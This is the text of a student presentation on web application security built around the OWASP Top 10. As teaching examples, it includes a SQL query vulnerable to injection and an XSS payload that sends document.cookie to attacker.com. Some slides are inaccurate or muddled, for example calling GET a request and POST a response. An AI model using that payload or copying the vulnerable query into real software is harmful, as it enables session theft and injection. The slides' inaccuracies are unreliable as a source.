It is an overview of Web Application Security

1. Web Application Security
CS200 PROJECT PRESENTATION
INSTRUCTOR: DR. FERDOUS AHMED
REFERENCE: HTTP://WWW.OWASP.ORG
1
Presented by:
Md Syed Ahamad

2. Project Role
 Theory
 Analysis
 Implementation
2

3. Topics
 Introduction
 Issues and solutions – OWASP
 Problems analysis
 Vulnerabilities
 preventions
 Common Mistakes
 Ways of approach
 Vulnerabilities Scanner
3

4. Background
 Many sensitive task are done through web
 Online banking, online shopping etc.
 Database access
 System administration
 Web applications and web users are targets of many attacks
 Network based attacks
 Injection
 Broken Authentication and Session Managements
 Cross site scripting
 And many more…
4

5. Introduction
 Web Application
 Web Browser communicates with Web Server to retrieve web pages.
 Web Application Security
 Deals specially with security of Web Applications
 Client – Server structure
5

6. Fundamentals of Web Apps.
 Uniform Resource Locator(URL)
 uniquely identify the location of a web page
 tells about type of communication, OS type, the type of web app.
code, and more.
 URL manipulation – a web application attack
6

7. Fundamentals of Web Apps.
 HTTP
 designates how the web browser and the web server communicate
with each other.
 Stateless protocol – a request is sent and a response is received after a
connection is established.
 Post Data
 Another portion of an HTTP request
 used when larger amounts of data need to be sent from the browser to
the web server
 Cookies
 Small amount of data supplied by web server and stored by web
browser
7

8. HTTP Request and Response
 Request – get
 Response – post
8
• Attack
• HTTP smuggling
• Cache Poisioning

9. Fundamentals of Web Apps.
 HTTPS
 HTTP wrapped with
Secure Sockets Layer
(SSL) encryption.
 Data sent is encrypted.
Protects data in transit.
9

10. Fundamentals of Web Apps. 10
 Firewall
 prevent unauthorized connections to protected network devices.
 Protect from network based attacks.
 Fail to protect web based attacks

11. Issues – Web based attacks
 OWASP
 An online Community dedicated to web application Security.
 It includes corporations, educational organizations, and individuals from
around the world.
 OWASP Top 10 – most important to discuss.
 to raise awareness about app. security by identifying some of the critical
risks organisations.
 Analyse clearly and solve the problems.
11

12. Applications Security Risks
 Attackers use different path to harm you.
 These factors determine the overall risk.
12

13. My Risks
 OWASP Risk Rating Methodology
13

14. OWASP Top 10
 A1 – Injection
 A2 – Broken Authentication and Session Managements
 A3 – Cross Site Scripting (XSS)
 A4 – Insecure Direct Object References
 A5 – Security Misconfiguration
 A6 – Sensitive Data Exposure
 A7 – Missing Function level Access Control
 A8 – Cross Site Request Forgery (CSRF)
 A9 – Using Known Vulnerable Components
 A10 – Invalidated Redirects and forwards
14

15. A1 - Injection
 Injection flaws – Sql, OS, LDAP etc.
 Data is sent to server as command and query.
 most prevalent and dangerous attacks on the Internet.
15

16. A1 - Injection
 Vulnerabilities
 Use of interpreter that clearly separates untrusted data, command or
query
 Avoid dynamic query, use stored procedures, prepared statements.
 Use of Code checking tools, penetration testers.
 Preventions
 Use of safe API.
 Escape special characters.
 No special characters – Positive or “white list” input validation.
16

17. A1 – Injection
 Example
 Scenario #1
String query = "SELECT * FROM accounts WHERE custID='" +
request.getParameter("id") + "'";
Select data from table where emailinput=‘email_input’;
17

18. A2 – Broken Authentication and
Session Management
 App. Related to session and authentication are not implemented correctly.
 Attackers try to compromise passwords, keys, or session tokens or user IDs.
18

19. A2 – Broken Authentication and
Session Management
 Vulnerabilities
 User IDs are not protected when stored using Hashing and encryption.
 guessed or overwritten through weak ac. Management.
 Session ID as exposed, don’t time out, don’t rotate after login etc.
 Preventions
 OWASP’s Application Security Verification Standard (ASVS).
 simple interface for developers.
 Strong effort to avoid XSS flaws.
19

20. A2 – Broken Authentication and
Session Management
 Example
 Scenario #1: Airline reservations application supports URL rewriting,
putting session IDs in the URL:
http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKH
CJUN2JV?dest=Hawaii
20

21. A3 – Cross Site Scripting
 Malicious code are injected to website.
 Stored, reflected and DOM based.
21

22. A3 – Cross Site Scripting
 Vulnerabilities
 Input not properly escaped.
 Input validated.
22

23. A3 – Cross Site Scripting
 Example
 The application uses untrusted data in the construction of the following
HTML snippet without validation or escaping:
 (String) page += "<input name='creditcard' type='TEXT‘
value='" + request.getParameter("CC") + "'>";
 The attacker modifies the ‘CC’ parameter in his browser to:
 '><script>document.location= 'http://www.attacker.com/cgi-
bin/cookie.cgi? foo='+document.cookie</script>'.
23

24. Way of approach
 SSL
 Website Vulnerability Scanner
 Types
 Network scanner
 Port scanner
 Web app. Security scanner
24

25. Vulnerability Scanner
 Acunetix Web Vulnerability Scanner
 Cenzic Hailstorm
 GFI LANguard Network Security Scanner
 Teneble Nessus 3
 Nmap
 QualysGuard
 Retina Network Security Scanner
 SAINT Network Vulnerability Scanner
25

26. My Goal
 To implement a prevention mechanism.
 To implement a detection mechanism.
26